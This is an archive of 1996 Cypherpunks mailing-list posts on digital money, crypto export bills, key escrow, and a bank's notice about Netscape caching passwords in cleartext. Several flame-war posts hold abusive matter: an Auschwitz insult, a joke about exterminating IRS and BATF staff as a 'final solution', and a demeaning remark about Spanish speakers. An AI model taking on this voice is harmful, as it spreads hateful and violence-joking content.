> The idea of your "market square" token, which represents a basket of
> other tokens, is interesting, but it seems like you're basically
> re-inventing money.  I don't quite understand the specifics of your
> proposal, where the market square token is based on the "market value" of
> the other tokens.  In what units is this market value expressed?  It
> seemed like what you had instead was a set of relative prices, where each
> token was worth a certain number of each other kind.  I don't see how you
> can get a unique market value for each token out of that system.

Anyone have the idea futures URL available?  The author should take a 
look at it.  Briefly, by offering "futures" contracts on ideas (queen 
mother dies by year 2000), one can get a market valuation of the 
legitimacy or likelihhood of this claims truth.

In the same way, a liquid exchange of tokens or coupons would provide 
fairly accurate valuations of the instruments.

All the exchange would have to do is provide token or coupon convertability 
into it's own tokens (exchange tokens, "etk"s) and then permit purchases of 
all the trading coupons or tokens in terms of exchange tokens.

e.g., assume currently one e$ is trading at 1etk.  Those wishing to buy 
"tacky tokens" with e$ need only purchase 1etk, then run their cursor 
down to the tacky token field and see that two tacky tokens are trading 
at 1etk.  Send the exchange their etk and get two tacky tokens.  (Of 
course, the exchange would be best off in demominating things in 
etk100,000's so as to collect a small exchange fee in their own currency 
easily.

The result might even be active trading in etk's.  Get an offshore bank 
involved, and you have real interesting stuff.

> It
> doesn't seem like the relative value idea really works, anyway, as it
> suffers from the barter problem that there will be too few people who
> want to trade their shoe tokens for fruit tokens.  That was what
> motivated the transition from barter to money in the first place, or so
> the story goes.

What I've proposed is just a local common exchange of sorts.  But it's 
only limited in so far as there are active users of the exchange.

> If your overall point is that even without digital cash, we would end
> up with some form of electronic money eventually anyway, I think it is
> true.  Entrepreneuers abhor a vacuum, and if the need is there it will
> be met.  But the fact is that we are likely to have digital cash before
> all these other things, so I don't really see the whole scenario coming
> to pass.  I do think a lot of your specific applications are
> interesting, though, and hopefully there will be many more creative
> uses of this technology.  I know Eric Hughes a while back was talking
> about a way for players to transfer wealth between MUD games using a
> token based system.  There are a lot of game possibilites.

The void to be filled will be as individuals see the advantages of 
minting their own currency.  My brain's tired.  Anyone want to spit some 
of these out?

> Hal
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Sun, 31 Mar 1996 02:29:05 +0800
To: David Loysen <dwl@hnc.com>
Subject: Re: your mail
In-Reply-To: <199603291755.JAA25340@spike.hnc.com>
Message-ID: <Pine.SV4.3.91.960330095337.7063E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Is there any indication that the GRU or Chinese or Iranian intelligence 
(I think these are our only foes nowadays who have blue-water {to mix a 
metaphor} spook services) could do better than the Japanese did in 
sigint'ing against human speakers of Navajoe?

Is the Navajo language still extent among draft-age men?  Life in the 
Southwest has changed considerably since 1943.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 31 Mar 1996 07:20:56 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.12 - Sen. Burns Announces New Bill To Lift Crypto Export Controls
Message-ID: <199603301805.KAA22524@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:52 PM 3/28/96 -0500, Bob Palacios wrote:
> The Burns bill is different from the other proposals in several respects.
> Specifically, the latest bill does not contain any new criminal provisions
> or provisions imposing liability on third party key holders.

Wow!!!

Have I been excessively cynical?  Perhaps, but the argument "You should 
support the Leahy bill or they will hit you with something worse" did 
nothing for my paranoia.

Now I expect the NSA to do a little tour of the halls of congress telling
the Senators "If you knew what we knew -- we would have to kill you", but
let us applaude Burns anyway.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sun, 31 Mar 1996 06:11:05 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: Test case for RSA t-shirts
In-Reply-To: <199603262347.LAA09880@cs26.cs.auckland.ac.nz>
Message-ID: <315D7895.307AB61A@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


pgut001@cs.auckland.ac.nz wrote:
> 
[...]
> In July I'll be going to the US for a conference.  I have one of Adam Backs
> RSA-in-perl t-shirts and am prepared to wear it into (and possibly back out of)
> the country if anyone feels it would do any good (for example to act as a test
> case for exportability).  If anyone thinks this would be useful or wants to
> offer a legal opinion, let me know.
[...]

   While we're on the subject, I called Sam Capino's office regarding my
CJR for this t-shirt, and he said they were still waiting for a response
from the NSA. I think my next move will be a letter asking exactly when
I can expect a response, and whether there's anything I can do to compel
a response, It was originally filed (in October) as a 15-day expedited
review.

   Thus, the actual legal status of the shirt is murky. Don't be
surprised if they approve it after they quit stalling.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Sun, 31 Mar 1996 02:29:35 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603291832.KAA06165@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.960330100234.7063G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> From: Hal <hfinney@shell.portal.com>

> I understand that
> in Las Vegas, some people started using casino chips as money.  You
> could buy things with them, and they were accepted since people knew
> they could be turned in for cash at the casino.  But the Feds cracked
> down and brought the practice to a halt.


   Noting your caveat that this is a rumor, I doubt it.  I'm not aware of 
there being any legal basis for doing so. The only possible related thing 
would be for the IRS to bothyer people _after the fact_   _if and only 
if_ they were using barter to to hide the receipt of income. For example, 
if you have declared on your tax return that you are engaged in _buying 
and selling widgets with the intent of realizing a profit_ (Schedule C), 
they are likely to question whether your bartering of a widget for 5 
50-cents-off-toilet-paper coupons, was really an even trade of your 
personal property for someone else's personal property.

Even in such case, the rule is not absolute. For example, the regulations 
which implement the taxation of the inter-state trade in firearms, make 
the presumption that the dealer does possess some number of firearms as 
chattels.

The legal tender laws are of very limited scope. Bus companies _are_ 
allowed to decline to accept dollar bills and instead demand exact change 
in coins, for example.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Mar 1996 03:07:32 +0800
To: cypherpunks@toad.com
Subject: The limits of my patience.
Message-ID: <199603301518.KAA12640@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by unicorn@schloss.li (Black Unicorn) on Sat, 
30 Mar  8:43 AM


>On Fri, 29 Mar 1996, jim bell wrote:

>> Explains a lot!   You _are_ paid for this.  In an earlier 
era, you would 
>> have gladly run the ovens at Auschwitz if you'd gotten paid 
for it.


>Black Unicorn wrote:

>You're way out of line here. I expect an apology.



Uni, thanks for noting Bell's XXX-poison, I'd stopped reading 
him, presuming his prescription was a dumb placebo for helpless 
hypochondriacs.


Now, his clumsiness is revealed to be a trick to conceal the 
deadliness of his toxin. Still not sure if he's understands the 
sickness he's spreading. He probably hasn't checked his 
contaminated sources very carefully, or maybe got infected and 
is terminally out of his mind.


Is there a doctor on the list, or a mortician?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Sun, 31 Mar 1996 02:58:52 +0800
To: "David K. Merriman" <merriman@arn.net>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
In-Reply-To: <2.2.32.19960330003531.00682704@arn.net>
Message-ID: <Pine.SV4.3.91.960330101615.7063H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> From: David K. Merriman <merriman@arn.net>

> >restroom-finding in a few languages.
> 
> The second necessarily follows from the first :-)

    While deployed to a remote radar station on an isolated island,
supplied solely by periodic but unreliable airfreight sorties, I oft found
myself wondering:  which is the more acute emergency.... to run out of food
or to run out of toilet paper? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 31 Mar 1996 09:23:13 +0800
To: cypherpunks@toad.com
Subject: What happened with Cypherpunks?
Message-ID: <199603301633.KAA09444@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Subject: what happened to Cypherpunks?
Date: Sat Mar 30 10:30:44 CST 1996

Hello,

Sorry if it is an offtopic question... Has something happened with 
this mailing list? In the last two weeks I received only one article.

My system log indicates that no messages have been received by our
machine.

Thanks!

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMV1ib8JFmFyXKPzRAQHrPAP+LkI7K5Xpvi2NpnlL8f72VuCkJ+3ZuYFj
6brj+3dzkgwb6Wiq0ayMQylM1uOGl3xrvsvqnKOaTgEu/c9KfmtiDL+/d/COt2pg
H9k8Hu/OpKiWGNU+6wPrGRsHDxzE4Q3e8OOoRFv3n5vxi8eHC3oXpOBpqSzT2LYd
3wzCS0puldg=
=alQh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 31 Mar 1996 03:19:00 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
In-Reply-To: <Pine.SUN.3.91.960329170907.15388E-100000@polaris.mindport.net>
Message-ID: <199603301540.KAA07025@homeport.org>
MIME-Version: 1.0
Content-Type: text


Black Unicorn wrote:

| While direct crypto relevance is limited, I thought that this work 
| might interest many on the list and so I decided to post it in any 
| event.  The sections on fourth and fifth amendment protections, or 
| lack thereof, for banking documents might shed some light on the 
| eventual disposition of crypto keys under the same circumstances.

	Actually, this is not all all irrelevant.  The question of how
a non-American living in the US can benefit from writign crypto code
has been a topic of discussion the last few days.  A real
understanding of laundering is needed for the time between now and
when the bad guys stop trying to tax the non-physical.

	I look forward to having a chance to read it. 

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 11:54:33 +0800
To: Adam Shostack <unicorn@schloss.li (Black Unicorn)
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
Message-ID: <m0u35gT-0008xzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 3/30/96 -0500, Adam Shostack wrote:
>Black Unicorn wrote:
>
>| While direct crypto relevance is limited, I thought that this work 
>| might interest many on the list and so I decided to post it in any 
>| event.  The sections on fourth and fifth amendment protections, or 
>| lack thereof, for banking documents might shed some light on the 
>| eventual disposition of crypto keys under the same circumstances.
>
>	Actually, this is not all all irrelevant.  The question of how
>a non-American living in the US can benefit from writign crypto code
>has been a topic of discussion the last few days.  A real
>understanding of laundering is needed for the time between now and
>when the bad guys stop trying to tax the non-physical.

While your interest in Unicorn's essay is understandable, I think you've 
missed the problems with his point of view.  He's apparently suffering from 
a disease which is supposed to be common among first year law students, 
specifically:  Citing legal precedents as if they are some sort of justification 
for themselves.  You correctly referred to "the bad guys" above as taxing 
the non-physical, so you're obviously on the right track.  Unicorn, however, 
does not REALLY think of them as being "the bad guys," in fact his gravy 
train _depends_ on them!  

It is this conflict of interest which drives him to cite precedent after 
precedent as somehow supporting his nebulous positions.  What he misses is 
that citing these precedents merely destroys whatever confidence we could 
have in the legal system.  And since the legal system will be charged with 
interpreting whatever bills are passed by Congress, by extension these 
precedents show that all the all the potential benefits promised by bills 
such as Leahy's are conditional.  Similarly, even a negative which appears 
minimal today could easily turn into a "killer" problem tomorrow.

Peter Junger's analysis of the Leahy bill was far more useful, primarily 
because it focussed on the areas that this bill could be abused.  Unicorn 
cites cases of abuse frequently, but does not identify them as such, leading 
me to conclude that all he can do is to cite precedent.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 31 Mar 1996 08:10:24 +0800
To: cypherpunks@toad.com
Subject: RE: Why Americans feel no compulsion to learn foreign langua
Message-ID: <199603301919.LAA26825@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


A foreign language is useful only when there are large numbers of
folk around who speak *one* *particular* foreign language, and these
folk have knowledge and skills and power and wealth, for example
if you are close neighbor of Germany or France.

Americans feel no compulsion to learn foreign languages because
the only time they need a foreign language is spanish to
negotiate with whores.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 31 Mar 1996 07:51:01 +0800
To: jimbell@pacifier.com>
Subject: Re: New crypto bill to be introduced
Message-ID: <199603301919.LAA26836@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


In my previous posting, I said that the Burns bill suggested that
I had been too paranoid.

Wrong.

As usual, not paranoid enough.

The Burns bill, and the "assault" weapons bill, and several other bills, 
are like TV wrestling.

The participants are working to a script with a predetermined outcome
that they have agreed to in advance.

The Burns bill will not only fail, it is intended to fail.  That is
why it was introduced now, when it is guaranteed to be painlessly
guillotined by the elections.

Politicians have their ear to the ground.  They are very much aware 
that the elite and the middle class are increasingly cynical about 
democracy and hostile to the corrupt poltical process, that many 
large groups see the government as unconstitutional and illegitimate, 
and see no hope or benefit in participation in politics.

The purpose of these bills is not to change who gets screwed, but
to draw those who are screwed back into the political process.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 31 Mar 1996 04:18:09 +0800
To: jimbell@pacifier.com>
Subject: Re: New crypto bill to be introduced
In-Reply-To: <m0u2lOI-0008xVC@pacifier.com>
Message-ID: <olLK_qC00YUvE6poEO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


A few responses to Jim Bell:

* Why would Sen. Burns introduce *this* particular crypto bill? Would
you believe that he wanted to appear cyber-clueful and net-friendly, but
didn't know exactly how to do that -- so certain people suggested that
this bill would be an appropriate way to do it?

* Why would Sen. Burns introduce this particular bill *now*? One word: CFP.

* Why would Jim Bell post anonymously? He writes:

> That is a silly conclusion.  The primary reason for anonymity with such 
> postings is to avoid controversy being associated with one's name.  I, as 

No, the primary reason for anonymity is to avoid being *associated* with
one's name. I know this may be attributing an undeserved sense of
precedence, but perhaps Jim Bell has realized that his opinions are
discarded out-of-hand by many on this list, so he posts anonymously to
regain some credibility. A message from anonymous would also work nicely
to reinforce his own position, allowing Jim Bell to claim additional
allies.

Anyway, last night I sat next to Dorothy Denning on the bus to the EFF
Pioneer Awards reception and dinner, and we chatted for about 20
minutes. She's a sweet old lady -- I can't think of anyone with whom
it's easier to agree to disagree. I asked her what she thought of a
number of people -- on Tim May she said: "Let's not talk about that."
She also said she's educating a House committee about crypto next week
-- I dearly hope our side will have some experts there as well.

-Declan




Excerpts from cypherpunks: 29-Mar-96 Re: New crypto bill to be i.. by
jim bell@pacifier.com 
> It's not that I'm suspicious of the wording of this new bill; I haven't even 
> seen it yet.  What is a bit suspicious is its timing.  Let's see, where do I 
> begin?   When the Leahy bill was first discussed around here, there were 
> claims (which, arguably, might be true) that this bill "couldn't be passed" 
> without the negative portions of the bill (key escrow commentary; 
> criminalization of encryption use, etc.)   More recently, it was claimed 
> that the Leahy bill was dead, and couldn't be revived by the end of the 
> session due to lack of time.  I don't necessarily challenge these claim; but 
> I note them and I also note that this new bill is going to run into the same 
> kind of time restraints as the Leahy bill would have, even more so.  Even 
> worse, this new bill will split off support from Leahy, meaning that 
> (everything else being equal) it is hard to imagine how this new bill (even 
> if it is everything we want, and nothing we don't want) will get passed.  
>  
> Maybe that's the idea:  As Tim May pointed out, at this time maybe no bill 
> is better than any bill.  And maybe what is needed is a bill to siphon 
> support away from Leahy, to ensure it's dead, which I presume this new bill 
> will do quite well even if it's never voted on.  If that's the case,  this 
> new bill may be a "conspiracy," but it might be a conspiracy that I can 
> actually sympathize with and support, even like.
>  
> Nevertheless so, I would at least like to look that gift horse in the
mouth, a
> nd 
> understand the motivations of the people proposing this new bill.  
>  
>  
> >* Jim Bell says we're "overdoing it on this 'List of Shame' thing." Not
> >at all -- we're proud to be on it! And you, Jim Bell, are one of my
> >primary suspects for authorship.
>  
> That is a silly conclusion.  The primary reason for anonymity with such 
> postings is to avoid controversy being associated with one's name.  I, as 
> anyone who's read my writing can attest, not only do not try to avoid 
> controversy, but in fact appear to seek it out, perhaps even to revel in it. 
>  Having taking a strongly anti-Leahy position before this anonymous poster 
> first appeared, it would be pointless for me to add my commentary in 
> anonymous form to that which I've already posted under my own name.
>  
> Furthermore, I've pointed out that there is no reason to exclude the 
> possibility that this anonymous poster isn't deliberately going too far, 
> mixing "deserving" names in with undeserving ones, in order to discredit 
> those people who are criticizing the supporters of the Leahy bill.  I can't 
> say this for certain, because there were a number of names on this "list of 
> shame" whose positions on Leahy I haven't even seen.  Nevertheless, 
> propaganda techniques are sophisticated, and I do notice a suspicious number 
> of people who appeared to want to "stand up for those people" rather than 
> standing up for the positions they took.  (Whatever they were.)
>  
> The implication is that the people who oppose this "list of shame" are doing 
> so primarily for PERSONALITY reasons, rather than on the issues.  I would 
> feel better about the whole thing if the people who volunteered for the list 
> had engaged in some sort of serious effort to show that the placement of the 
> other people on that list was unjustified.  Lacking even the most 
> rudimentary effort along these lines, I really wonder who (and what) these 
> people think they're supporting.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Mar 1996 06:37:47 +0800
To: "Declan O'Donovan/ITP/IE" <Declan_O'cypherpunks@toad.com>
Subject: Re: unsuscribe
Message-ID: <ad82bd8441021004e7b7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:47 AM 3/28/96, "Declan O'Donovan/ITP/IE"
<Declan_O'Donovan/ITP/IE.ITP@bonzo.it wrote:
>unsuscribe

Declan (the other one), you have misspelled "unsuscribe" and you have sent
your request to the wrong place.

To let others know that you have been told what to do, for the usual
game-theoretic reasons, I'm leaving the CP list copied on this reply.


How to subscribe to the Cypherpunks mailing list: send a message to
"majordomo@toad.com" with the body message "subscribe cypherpunks". To
unsubscribe, send the message "unsubscribe cypherpunks" to the same
address. For help, send "help cypherpunks".  Don't send these requests to
the Cypherpunks list itself. And be aware that the list generates between
40 and 100 messages a day.





Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 31 Mar 1996 05:14:01 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <960330120159_181484785@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


To Jim Bell and "Black Unicorn":

I have been following your debate with interest, and would like to re-iterate
some points that were made and add some of my own.

The concept of encrypting a key before escrowing it is excellent.  It
prevents the escrow agent from misusing the key, and protects the principal
from government snooping.  If the escrow agent is served a subpoena, he can
say, "Here is the key you want. Go ahead and take it.  In fact, here is my
entire key database.  All keys are encrypted by the principals before I get
them, so I can't guarantee that you will be able to use them, but here they
are anyway."  At this point, the LEO's can take whatever they want, but the
principals are still safe.  The escrow agent doesn't have to send any
encrypted "rosebud" message to anyone, and he can bend over backwards to make
the LEO's happy, so his butt is covered, too.  At this point, the LEO's can
either (a) send the keys to the NSA for decryption, and thereby admit that
the gov't can break IDEA (or whatever cryptosystem was used to encrypt the
keys before the escrow agent got them), (b) rubber hose the unencrypted
key(s) from the principal, or (c) go home and pout.

Of course, if you never escrow your keys, you can avoid the whole scenario
altogether, leaving the gov't with options (b) and (c).

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 21:20:28 +0800
To: unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u36wg-0008yEC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:52 AM 3/29/96 -0800, jamesd@echeque.com wrote:
>On Thu, 28 Mar 1996, jim bell wrote:
>> > Escrowing encrypted keys makes them useless to subpoena, and in 
>> > fact it helps the key owner because the escrow agent can (and, in fact, 
>> > must!) be obligated to inform the key owner if his key is requested.
>
>At 05:49 AM 3/29/96 -0500, Black Unicorn wrote:
>> I thought I would take the time to let everyone know that this is 
>> baseless as well.  Most jurisdictions forbid third parties to reveal 
>> prosecution inquries to the principal for which they are holding 
>> documents or other information.  A VERY few have laws on the books that 
>> require this disclosure.  Switzerland is no longer one of them.
>
>If you had actually read the article that you criticize you would
>have noticed that the "must" was enforced by cryptographic 
>protocols, not by the blunt sword of the law.

I do think it's interesting how Unicorn so easily falls into these mental 
ruts.  He thinks only in terms of what the government wants and what it does 
to get it, not what other people want and what they can do for their own 
benefit.  

One useful function that CP can and should provide is to disseminate ideas 
about future crypto developments, ones that do not merely encrypt and 
decrypt files and messages, but also incorporate encryption into systems so 
that government attacks on them ("legal" as well as surreptitious) are 
guaranteed to be fruitless.

This will require coding, but it will primarily require enough imagination 
to figure out ways around all the tactics normally used to force people to 
give up information to the detriment of citizens.  Ironically, this will 
make people like Unicorn useful, because whether or not his morality is 
intact he may have plenty of examples of how government abuses its position. 
 However, he doesn't appear to have the mental wherewithall or inclination 
to turn those facts into sketches of effective countermeasures.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 31 Mar 1996 21:05:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v02120d88ad834ab42177@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Yes, Netscape caches passwords.

--- begin forwarded text

From: support@sfnb.com
Date: Fri, 29 Mar 96 17:27:02 -0500
Sender: <support@sfnb.com>
Apparently-To: bankusers@sfnb.com

Dear Security First customer:

With the release of Netscape Navigator 2.0, Netscape enhanced their
caching mechanism to improve the browser's performance.  As a result
of this enhancement, the Navigator was storing Security First username
and password information when entered in cleartext on a customer's
local hard drive in a file called fat.db.  Therefore, if a
knowledgeable and malicious person had access to a Security First
customer's computer, they could have potentially stolen that customer's
username and password.  To our knowledge, this vulnerability was NOT
exploited by anyone.

We were made aware of this fact in an e-mail to the bank from Lucky
Green, a frequent contributor to the cypherpunks mailing list.
Immediately upon learning of this situation, Five Paces engineers
worked closely with Netscape engineers and fixed the problem.  To
prevent caching of the username and password, we changed the login
script to include "pragma: no-cache" in the http header.  This
command instructs the browser not to cache any information from this
page on the local hard drive.

Please note this was not specific to Security First.  Any Web site
that requests a username and password in an onscreen form is
potentially vulnerable to this cleartext caching if the "pragma:
no-cache" header is not used.

In order to ensure that your username and password have been cleared
from your cache, bank customers should go to the Options dropdown
menu in the Navigator, and select Network, then Cache, and then click
on the "Clear Disk Cache Now" button.  We know that software involving
Internet commerce is changing at a rapid pace, and we will continue
to monitor all changes that might affect our customers.

We would like to thank Lucky and also Jeff Weinstein of Netscape for
bringing this to our attention.  The Internet community benefits when
we all work together to make it a better network.

If you have any questions, please do not hesitate to e-mail me at
karlin@sfnb.com, or our customer service staff at support@sfnb.com.

Sincerely,

Michael Karlin
President & COO
Security First Network Bank

================================================================
Michael S. Karlin                    Security First Network Bank
2957 Clairmont Road                  404.679.3201
Suite 280                            404.679.3210 Fax
Atlanta, GA  30329                   karlin@sfnb.com

--- end forwarded text


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 06:39:03 +0800
To: cypherpunks@toad.com
Subject: Re: The limits of my patience.
In-Reply-To: <Pine.SUN.3.91.960330083841.13577A-100000@polaris.mindport.net>
Message-ID: <287LLD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> On Fri, 29 Mar 1996, jim bell wrote:
> >
> > >Anyone who knows me knows I spend all my days end arounding the
> > >U.S. government.
> >
> > Explains a lot!   You _are_ paid for this.  In an earlier era, you would
> > have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>
> You're way out of line here.
> I expect an apology.

Consider the above in context. Would you be willing to run the ovens/gas
chambers if you were exterminating U.S. government employees/contractors?

"The final solution to the IRS/BATF problem." :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 20:02:25 +0800
To: cypherpunks@toad.com
Subject: Re: The limits of my patience.
Message-ID: <m0u38Cu-0008xXC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:46 PM 3/30/96 EST, Dr. Dimitri Vulis wrote:
>Black Unicorn <unicorn@schloss.li> writes:
>
>> On Fri, 29 Mar 1996, jim bell wrote:
>> >
>> > >Anyone who knows me knows I spend all my days end arounding the
>> > >U.S. government.
>> >
>> > Explains a lot!   You _are_ paid for this.  In an earlier era, you would
>> > have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>>
>> You're way out of line here.
>> I expect an apology.
>
>Consider the above in context. Would you be willing to run the ovens/gas
>chambers if you were exterminating U.S. government employees/contractors?
>
>"The final solution to the IRS/BATF problem." :-)

Aw, C'mon Dimitri.  Don't try to tease me.  You _know_ I get glassy-eyed 
when  I hear stuff like this!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 10:58:28 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: New crypto bill to be introduced
In-Reply-To: <olLK_qC00YUvE6poEO@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960330133136.22592A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, Declan B. McCullagh wrote:

> * Why would Jim Bell post anonymously? He writes:
> 
> > That is a silly conclusion.  The primary reason for anonymity with such 
> > postings is to avoid controversy being associated with one's name.  I, as 
> 
> No, the primary reason for anonymity is to avoid being *associated* with
> one's name. I know this may be attributing an undeserved sense of
> precedence, but perhaps Jim Bell has realized that his opinions are
> discarded out-of-hand by many on this list, so he posts anonymously to
> regain some credibility. A message from anonymous would also work nicely
> to reinforce his own position, allowing Jim Bell to claim additional
> allies.

It is a measure of desperation when resorting to completely anonymous 
postings creates an >increase< in reputation capital.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Sun, 31 Mar 1996 20:02:31 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
In-Reply-To: <Pine.SV4.3.91.960330101615.7063H-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.92.960330134053.22689E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, Alan Horowitz wrote:

>
>     While deployed to a remote radar station on an isolated island,
> supplied solely by periodic but unreliable airfreight sorties, I oft found
> myself wondering:  which is the more acute emergency.... to run out of food
> or to run out of toilet paper?
>

If you had studied almost any non-European language, you would have
learned the word for `toilet paper' is `your left hand and a bucket of
water.'

Charles Bell







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 08:07:39 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
In-Reply-To: <m0u35gT-0008xzC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960330135707.22592C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, jim bell wrote:

> At 10:40 AM 3/30/96 -0500, Adam Shostack wrote:
> >Black Unicorn wrote:

> >	Actually, this is not all all irrelevant.  The question of how
> >a non-American living in the US can benefit from writign crypto code
> >has been a topic of discussion the last few days.  A real
> >understanding of laundering is needed for the time between now and
> >when the bad guys stop trying to tax the non-physical.
